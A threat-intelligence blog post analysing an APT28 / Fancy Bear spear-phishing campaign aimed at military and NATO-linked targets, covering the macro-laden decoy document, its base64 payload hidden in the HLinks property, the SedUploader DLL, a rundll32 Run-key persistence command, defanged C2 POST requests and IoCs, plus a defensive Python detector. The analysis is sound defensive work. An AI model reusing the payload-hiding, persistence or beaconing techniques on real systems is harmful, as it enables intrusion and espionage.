APT28 / Fancy Bear still targeting military institutions

APT28, aka Fancy Bear, the well-known hacker group believed to be Russian state-sponsored, appears to be targeting NATO partners and defense / military institutions right now. Spear-phishing emails carrying a malicious attached document that refers to a "NATO simulation" event (the document is named "NATO Simulation.doc") appear to be in use in an attempt to compromise some institutional entities (likely in Northern / Eastern Europe).

The hunting group involved in the analysis of this event is composed of @MD0ugh, @DrunkBinary, @r0ny_123 and @Manu_De_Lucia.

Thanks to @MD0ugh for sharing the sample with all of us.

Quick Recap:

The document has been designed to drop a first malicious component likely belonging to the APT28 / Fancy Bear arsenal.

A fairly high rate of code reuse and internal analysis confirm it is a SedUploader variant.

Metadata and other investigations suggest that the malicious infrastructure and components were set up only a few days ago (at the end of November 2018).

Some images about the domain name creation date

[image: domain name creation date]

and the service being set up

[image: service setup]

On the basis of what I can observe in the samples and in public data, the following is a timeline reconstruction of how the operation was developed:

[image: operation timeline]

Technical Details:

A screenshot of part of the attached decoy is shown below:

[image: spear-phishing document screenshot]

This spear-phishing document (md5: 43D7FFD611932CF51D7150B176ECFC29) is armed with macro code designed to work primarily through the main event handled by sub AutoOpen().

The embedded .bin content sits at offset 0x00006460:

[image: document offset of the embedded content]

On macro activation the instructions read a specific XML node of the document itself through an XML parser and extract / decode the base64-encoded content found at the XPath

//HLinks/vt:vector/vt:variant/vt:lpwstr
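As an added defender-side example (not code from the original post or from the analysed macro), the following Python script performs the same XPath lookup from the analyst's side: it walks the HLinks extended property of a constructed flat-OPC fragment, pulls every vt:lpwstr value and flags any that is base64 text decoding to a PE ("MZ") image. The namespaces are the standard OOXML ones; the sample XML, the PE stub and the function names are constructed for this example.

```python
import base64
import re
import xml.etree.ElementTree as ET

VT_NS = "{http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes}"
B64_RE = re.compile(r"^[A-Za-z0-9+/=\s]+$")

# Constructed sample: a fake PE stub (just an "MZ" header) base64-encoded into
# one lpwstr of the HLinks extended property, next to a harmless hyperlink.
PE_STUB = b"MZ\x90\x00" + b"\x00" * 28
PAYLOAD_B64 = base64.b64encode(PE_STUB).decode()
SAMPLE_XML = f"""<?xml version="1.0"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
            xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <HLinks>
    <vt:vector size="6" baseType="variant">
      <vt:variant><vt:i4>5</vt:i4></vt:variant>
      <vt:variant><vt:lpwstr>https://example.invalid/legit</vt:lpwstr></vt:variant>
      <vt:variant><vt:lpwstr>{PAYLOAD_B64}</vt:lpwstr></vt:variant>
    </vt:vector>
  </HLinks>
</Properties>
"""


def hlinks_lpwstr_values(xml_text):
    """Text of every vt:lpwstr under HLinks: //HLinks/vt:vector/vt:variant/vt:lpwstr."""
    root = ET.fromstring(xml_text)
    values = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "HLinks":      # namespace-agnostic match
            for node in el.iter(VT_NS + "lpwstr"):
                if node.text:
                    values.append(node.text.strip())
    return values


def suspicious_hlinks(xml_text):
    """Flag lpwstr values that are base64 text decoding to a PE ("MZ") image."""
    findings = []
    for value in hlinks_lpwstr_values(xml_text):
        if len(value) < 16 or not B64_RE.match(value):
            continue                                    # ordinary hyperlinks end here
        try:
            blob = base64.b64decode(value)
        except ValueError:                              # binascii.Error is a ValueError
            continue
        if blob[:2] == b"MZ":
            findings.append({"decoded_size": len(blob), "preview": value[:24]})
    return findings
```

Run against the docProps/app.xml of a suspect .docx (or the WordOpenXML of a .doc) to triage documents carrying a payload in their hyperlink property.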

The extracted VBA macro code is very similar to that used previously in the APT28 / Fancy Bear "hospitality campaign".

The following image compares an extract of the two codes:

[image: macro code comparison]

The payload is nothing more than a PE DLL executable file.

This is dropped under

%APPDATA%\Uplist.dat

and

%ALLUSERSPROFILE%\UpdaterUI.dll.

Files are written with the vbHidden attribute.

Part of the base64-encoded payload follows:

[image: base64-encoded payload]

Macro instructions within the sub_AutoOpen() function are also designed to achieve persistence, writing under the following registry key

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UIMgr

with a REG_SZ value

C:\Windows\System32\rundll32.exe "%ALLUSERSPROFILE%\UpdaterUI.dll ", "#1""

[image: macro persistence code]

The first run is performed through WMI:

[image: macro WMI execution code]

sub_AutoClose() has similar functionality, writing a PE with a randomly generated name under %TEMP%, which appears to be executed via PowerShell.

SedUploader:

The dropped content appears to be a SedUploader variant identified by MD5 hash: 549726B8BFB1919A343AC764D48FDC81

Some details about it:

[image: SedUploader sample details]

From the malware components under my lens, the actor is reusing the same TTPs observed in similar operations conducted in the past.

I first performed a static / comparative code analysis of the malicious executable, obtaining the following results:

[image: code reuse analysis results]

The malware family was later confirmed by the Intezer platform. View their report here.

Looking at some DNS statistical hits observed for the extracted domain name, it may be that at least one of these spear-phishing documents achieved the mission of first-phase access. Obviously, there is no certainty about it [really still few statistics about it].

Finally, a quick high-level breakdown of the main loop of the malware is reported below:

[image: malware workflow]

The outside world is contacted through requests like these:

[+] POST hxxps://beatguitar.com/aadv/gJNn/X2/ep/VQOA/3.SMPTE292M/?ct=+lMQKtXi0kf+3MVk38U=

[+] POST hxxps://beatguitar.com/n2qqSy/HPSe0/SY/yAsFy8/mSaYZP/lw.sip/?n=VxL0BnijNmtTnSFIcoQ=

after having collected several pieces of information about the victim system and having performed some minimal anti-VM and connectivity checks [requesting legitimate services].

The first list of IoCs reported and the components under analysis are compatible with the modus operandi of the group in question (domain registration, technologies in place, component fingerprints). The activity is also in line with the actor's mission.

At the time of writing, some further malicious domain names possibly related to the campaign are under investigation. Analysis is ongoing.

IoC:

domain name: beatguitar[.]com

IP: 185.99.133[.]72

md5: 43D7FFD611932CF51D7150B176ECFC29 [Spear-phishing DOC]

md5: 549726B8BFB1919A343AC764D48FDC81 [SedUploader / SofacyCarberp]

File name: NATO Simulation.doc

File name: UpdaterUI.dll

File name: Uplist.dat

Persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UIMgr

Insights:

FireEye: APT28 targets hospitality sector

PaloAlto Unit42: Sofacy Attacks Multiple Government Entities

CSECybSec: APT28 – Hospitality Malware

ESET Research: Sednit update: Analysis of Zebrocy
